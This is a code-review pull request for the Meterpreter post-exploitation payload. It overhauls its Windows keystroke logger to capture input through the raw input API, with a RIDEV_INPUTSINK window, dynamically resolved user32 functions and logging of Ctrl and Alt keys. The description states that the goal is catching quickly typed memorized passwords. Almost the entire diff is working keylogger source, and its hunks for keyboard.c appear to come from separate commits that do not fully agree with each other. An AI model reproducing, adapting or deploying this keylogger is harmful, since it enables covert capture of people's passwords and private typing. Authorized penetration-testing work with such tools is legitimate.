### PR TITLE
Overhaul keyscan to use the raw input message queue

### DIFF
--- a/c/meterpreter/source/extensions/stdapi/server/ui/keyboard.c
+++ b/c/meterpreter/source/extensions/stdapi/server/ui/keyboard.c
@@ -5,6 +5,8 @@
 extern HMODULE hookLibrary;
 extern HINSTANCE hAppInstance;
 
+LRESULT CALLBACK ui_keyscan_wndproc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam);
+
 /*
  * Enables or disables keyboard input
  */

--- a/c/meterpreter/source/extensions/stdapi/server/ui/keyboard.c
+++ b/c/meterpreter/source/extensions/stdapi/server/ui/keyboard.c
@@ -1,8 +1,3 @@
-/*
- *	TODO:
- *	- randomize class name or think of something clever
- */
-
 #include "precomp.h"
 #include "raw.h"
 #include <tchar.h>
@@ -53,7 +48,7 @@ bool boom[1024];
 const char g_szClassName[] = "klwClass";
 HANDLE tKeyScan = NULL;
 char *key_scan_buf = NULL;
-int keyscan_size = 1024*1024;
+unsigned int keyscan_size = 1024*1024;
 unsigned int g_ksindex = 0;
 
 /*
@@ -278,6 +273,12 @@ int ui_log_key(UINT vKey)
             break;
         case VK_SHIFT:
             break;
+		case VK_LCONTROL:
+			g_ksindex += wsprintf(key_scan_buf + g_ksindex, "<Ctrl>");
+			break;
+		case VK_MENU:
+			g_ksindex += wsprintf(key_scan_buf + g_ksindex, "<Alt>");
+			break;
         default:
             if(ToAscii(vKey, MapVirtualKey(vKey, 0), lpKeyboard, &wKey, 0) == 1) {
                 g_ksindex += wsprintf(key_scan_buf + g_ksindex, "%c", (char)wKey);

--- a/c/meterpreter/source/extensions/stdapi/server/ui/keyboard.c
+++ b/c/meterpreter/source/extensions/stdapi/server/ui/keyboard.c
@@ -1,11 +1,13 @@
 #include "precomp.h"
-
+#include "raw.h"
 #include <tchar.h>
 
 extern HMODULE hookLibrary;
 extern HINSTANCE hAppInstance;
 
 LRESULT CALLBACK ui_keyscan_wndproc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam);
+int ui_log_key(UINT vKey);
+int ui_resolve_raw_api();
 
 /*
  * Enables or disables keyboard input
@@ -50,6 +52,12 @@ unsigned int lenKeyScanBuff = 0;
 int KeyScanSize = 1024*1024;
 int KeyScanIndex = 0;
 
+/*
+ * function pointers for the raw input api
+ */
+
+f_GetRawInputData fnGetRawInputData;
+f_RegisterRawInputDevices fnRegisterRawInputDevices;
 
 /*
  *  key logger updates begin here
@@ -60,6 +68,16 @@ int WINAPI ui_keyscan_proc()
 WNDCLASSEX klwc;
     HWND hwnd;
     MSG msg;
+    int ret = 0;
+
+    if (fnGetRawInputData == NULL || fnRegisterRawInputDevices == NULL)
+    {
+      ret = ui_resolve_raw_api();
+      if (ret != 1)
+      { // resolving functions failed
+        return 0;
+      }
+    }
 
     // register window class
     ZeroMemory(&klwc, sizeof(WNDCLASSEX));
@@ -122,27 +140,27 @@ LRESULT CALLBACK ui_keyscan_wndproc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM l
             rid.dwFlags = RIDEV_INPUTSINK;
             rid.hwndTarget = hwnd;
             
-            if(!RegisterRawInputDevices(&rid, 1, sizeof(RAWINPUTDEVICE)))
+            if(!fnRegisterRawInputDevices(&rid, 1, sizeof(RAWINPUTDEVICE)))
             {
                 return -1;
             }
             
         case WM_INPUT:
             // request size of the raw input buffer to dwSize
-            GetRawInputData((HRAWINPUT)lParam, RID_INPUT, NULL, &dwSize,
+            fnGetRawInputData((HRAWINPUT)lParam, RID_INPUT, NULL, &dwSize,
                 sizeof(RAWINPUTHEADER));
         
             // allocate buffer for input data
             buffer = (RAWINPUT*)HeapAlloc(GetProcessHeap(), 0, dwSize);
         
-            if(GetRawInputData((HRAWINPUT)lParam, RID_INPUT, buffer, &dwSize,
+            if(fnGetRawInputData((HRAWINPUT)lParam, RID_INPUT, buffer, &dwSize,
                 sizeof(RAWINPUTHEADER)))
             {
                 // if this is keyboard message and WM_KEYDOWN, log the key
                 if(buffer->header.dwType == RIM_TYPEKEYBOARD
                     && buffer->data.keyboard.Message == WM_KEYDOWN)
                 {
-                    if(LogKey(buffer->data.keyboard.VKey) == -1)
+                    if(ui_log_key(buffer->data.keyboard.VKey) == -1)
                         DestroyWindow(hwnd);
                 }
             }
@@ -174,7 +192,7 @@ DWORD request_ui_start_keyscan(Remote *remote, Packet *request)
 	} else {
 		// Make sure we have access to the input desktop
 		if(GetAsyncKeyState(0x0a) == 0) {
-			tKeyScan = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE) ui_keylog_proc, NULL, 0, NULL);
+			tKeyScan = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ui_keyscan_proc, NULL, 0, NULL);
 		} else {
 			// No permission to read key state from active desktop
 			result = 5;
@@ -272,3 +290,33 @@ int ui_log_key(UINT vKey)
 /*
  * DO NOT REMOVE THIS UNTIL YOU ARE FAIRLY CERTAIN POTENTIAL OVERFLOWS ARE DEALT WITH
  */
+
+/*
+ * resolve the required functions from the raw input api 
+ */
+
+int ui_resolve_raw_api()
+{
+  HINSTANCE hu32 = LoadLibrary("user32.dll");
+
+  if (hu32 == NULL)
+  {
+    return 0;
+  }
+
+  fnGetRawInputData = (f_GetRawInputData)GetProcAddress(hu32, "GetRawInputData");
+  if (fnGetRawInputData == NULL)
+  {
+    FreeLibrary(hu32);
+    return 0;
+  }
+
+  fnRegisterRawInputDevices = (f_RegisterRawInputDevices)GetProcAddress(hu32, "RegisterRawInputDevices");
+  if (fnRegisterRawInputDevices == NULL)
+  {
+    FreeLibrary(hu32);
+    return 0;
+  }
+  
+  return 1;
+}

--- a/c/meterpreter/source/extensions/stdapi/server/ui/raw.h
+++ b/c/meterpreter/source/extensions/stdapi/server/ui/raw.h
@@ -1,0 +1,150 @@
+#define WM_INPUT                    0x00FF
+#define RID_INPUT               0x10000003
+#define RID_HEADER              0x10000005
+
+/*
+ * Type of the raw input
+ */
+#define RIM_TYPEMOUSE       0
+#define RIM_TYPEKEYBOARD    1
+#define RIM_TYPEHID         2
+
+#define RIDEV_INPUTSINK         0x00000100
+
+/*
+* Raw Input Messages.
+*/
+
+DECLARE_HANDLE(HRAWINPUT);
+
+/*
+* Raw format of the mouse input
+*/
+
+typedef struct tagRAWMOUSE {
+  /*
+  * Indicator flags.
+  */
+  USHORT usFlags;
+
+  /*
+  * The transition state of the mouse buttons.
+  */
+  union {
+    ULONG ulButtons;
+    struct  {
+      USHORT  usButtonFlags;
+      USHORT  usButtonData;
+    };
+  };
+
+
+  /*
+  * The raw state of the mouse buttons.
+  */
+  ULONG ulRawButtons;
+
+  /*
+  * The signed relative or absolute motion in the X direction.
+  */
+  LONG lLastX;
+
+  /*
+  * The signed relative or absolute motion in the Y direction.
+  */
+  LONG lLastY;
+
+  /*
+  * Device-specific additional information for the event.
+  */
+  ULONG ulExtraInformation;
+
+} RAWMOUSE, *PRAWMOUSE, *LPRAWMOUSE;
+
+/*
+* Raw format of the keyboard input
+*/
+typedef struct tagRAWKEYBOARD {
+  /*
+  * The "make" scan code (key depression).
+  */
+  USHORT MakeCode;
+
+  /*
+  * The flags field indicates a "break" (key release) and other
+  * miscellaneous scan code information defined in ntddkbd.h.
+  */
+  USHORT Flags;
+
+  USHORT Reserved;
+
+  /*
+  * Windows message compatible information
+  */
+  USHORT VKey;
+  UINT   Message;
+
+  /*
+  * Device-specific additional information for the event.
+  */
+  ULONG ExtraInformation;
+
+
+} RAWKEYBOARD, *PRAWKEYBOARD, *LPRAWKEYBOARD;
+
+
+/*
+* Raw format of the input from Human Input Devices
+*/
+typedef struct tagRAWHID {
+  DWORD dwSizeHid;    // byte size of each report
+  DWORD dwCount;      // number of input packed
+  BYTE bRawData[1];
+} RAWHID, *PRAWHID, *LPRAWHID;
+
+/*
+ * RAWINPUTDEVICE data structure.
+ */
+typedef struct tagRAWINPUTDEVICE {
+    USHORT usUsagePage; // Toplevel collection UsagePage
+    USHORT usUsage;     // Toplevel collection Usage
+    DWORD dwFlags;
+    HWND hwndTarget;    // Target hwnd. NULL = follows keyboard focus
+} RAWINPUTDEVICE, *PRAWINPUTDEVICE, *LPRAWINPUTDEVICE;
+
+typedef CONST RAWINPUTDEVICE* PCRAWINPUTDEVICE;
+
+/*
+* Raw Input data header
+*/
+typedef struct tagRAWINPUTHEADER {
+  DWORD dwType;
+  DWORD dwSize;
+  HANDLE hDevice;
+  WPARAM wParam;
+} RAWINPUTHEADER, *PRAWINPUTHEADER, *LPRAWINPUTHEADER;
+
+/*
+ * RAWINPUT data structure.
+ */
+typedef struct tagRAWINPUT {
+    RAWINPUTHEADER header;
+    union {
+        RAWMOUSE    mouse;
+        RAWKEYBOARD keyboard;
+        RAWHID      hid;
+    } data;
+} RAWINPUT, *PRAWINPUT, *LPRAWINPUT;
+
+
+typedef UINT (WINAPI *f_GetRawInputData)(
+	  __in HRAWINPUT hRawInput,
+    __in UINT uiCommand,
+    __out_bcount_part_opt(*pcbSize, return) LPVOID pData,
+    __inout PUINT pcbSize,
+    __in UINT cbSizeHeader);
+
+typedef BOOL (WINAPI *f_RegisterRawInputDevices)(
+    __in_ecount(uiNumDevices) PCRAWINPUTDEVICE pRawInputDevices,
+    __in UINT uiNumDevices,
+    __in UINT cbSize);


### PR DESCRIPTION
This modifies the current key logging facilities in the stdapi extension to use the raw input api.  In it's current state, the key logging code can miss keystrokes due to polling synchronization issues, such as when someone is typing a memorized password very quickly.  The raw input subsystem queues all messages from input devices at the driver level, ensuring that queries from the userland API will not miss anything.

Unfortunately, this probably breaks support for NT4.  I recommend users needing support for such systems go and download d3adg1rlzz_KeYLoGGa_666.exe from Silicon Toad's Infinity Void.

This will break a couple of framework modules, as key modifiers will no longer need to be processed in the same manner with GetAsyncKeyState().  I'm working on it.

For testing purposes, the keyscan_extract method in lib/rex/post/meterpreter/extensions/stdapi/ui.rb will need to be modified (it basically becomes a nop returning its own argument).  I'll update with the appropriate framework PR when I get to it.

Update:  Associated framework PR necessary for testing is here https://github.com/rapid7/metasploit-framework/pull/8011 - or you could always edit the file yourself